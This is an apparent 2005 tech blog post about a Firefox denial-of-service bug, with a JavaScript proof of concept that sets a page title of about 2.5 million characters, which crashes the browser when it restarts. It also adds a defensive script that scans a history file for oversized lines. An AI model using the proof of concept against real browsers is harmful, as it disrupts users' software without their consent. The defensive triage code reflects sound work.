Elliott C. Back: Technology FTW!

The Latest Firefox Exploit: DOS via local buffer overflow

Posted in Browsers, Code, Computers & Technology, Law, Spread IE by Elliott Back on December 8th, 2005.

Apparently Firefox logs URL data in history.dat, which means it also saves page titles. If a page makes its title long enough, as the following bit of JavaScript does, the result is a denial of service (DoS) against Firefox the next time the browser loads:

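<script type="text/javascript">
function ex() {
	// Build a 5,000-character string.
	var buffer = "";
	for (var i = 0; i < 5000; i++) {
		buffer += "A";
	}
	// Append it 500 more times: 2,505,000 characters in total.
	var buffer2 = buffer;
	for (i = 0; i < 500; i++) {
		buffer2 += buffer;
	}
	// The browser saves this title, together with the URL, in its history.
	document.title = buffer2;
}
</script>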

The anonymous author claims that code execution is also possible. Hopefully this will get fixed soon?
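
For triage on the defender's side, here is an added example (not code from the original post or from Firefox) that scans a file, such as a copy of a profile's history.dat, for abnormally long lines. The 64 KiB threshold, the function names and the premise that an oversized title is stored as one very long line are assumptions.

```javascript
// Added example (not from the original post): flag oversized lines in a
// history file. Assumption: a huge title is stored as one very long line.
const MAX_LINE_BYTES = 64 * 1024; // assumed threshold; tune to your data

// Walk an iterable of Buffers and report each line longer than `limit`.
// Only counters are kept, so a multi-megabyte file is never held in memory.
function findOversizedLines(chunks, limit = MAX_LINE_BYTES) {
  const hits = [];
  let lineNo = 1, lineLen = 0;
  const endLine = () => {
    if (lineLen > limit) hits.push({ line: lineNo, bytes: lineLen });
    lineNo++;
    lineLen = 0;
  };
  for (const chunk of chunks) {
    let start = 0, nl;
    while ((nl = chunk.indexOf(0x0a, start)) !== -1) {
      lineLen += nl - start; // bytes before this newline
      endLine();
      start = nl + 1;
    }
    lineLen += chunk.length - start; // partial line carries into next chunk
  }
  if (lineLen > 0) endLine(); // final line without a trailing newline
  return hits;
}

// Read a file in fixed-size chunks (synchronous, for a one-off triage run).
function* readChunks(path, size = 64 * 1024) {
  const fs = require("fs");
  const fd = fs.openSync(path, "r");
  try {
    const buf = Buffer.alloc(size);
    let n;
    while ((n = fs.readSync(fd, buf, 0, size, null)) > 0) yield buf.subarray(0, n);
  } finally {
    fs.closeSync(fd);
  }
}

const scanFile = (path) => findOversizedLines(readChunks(path));

// Constructed sample, not real history.dat syntax: one line carries a
// 2,505,000-byte title (the length the page's script builds), split in two.
function sampleChunks() {
  const big = Buffer.alloc(2505000, "A");
  return [Buffer.from("short line\nTitle="), big.subarray(0, 1000000),
          big.subarray(1000000), Buffer.from("\nlast line\n")];
}

console.log(findOversizedLines(sampleChunks()));
```

Call scanFile on a copy of the file rather than on the live profile while the browser is running.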

This entry was posted on Thursday, December 8th, 2005 at 12:19 am and is tagged with local buffer overflow, denial of service dos attack, code execution, denial of service dos, url data, denial of service, anonymous author, author claims, script type, document title, text javascript, lt, logs.
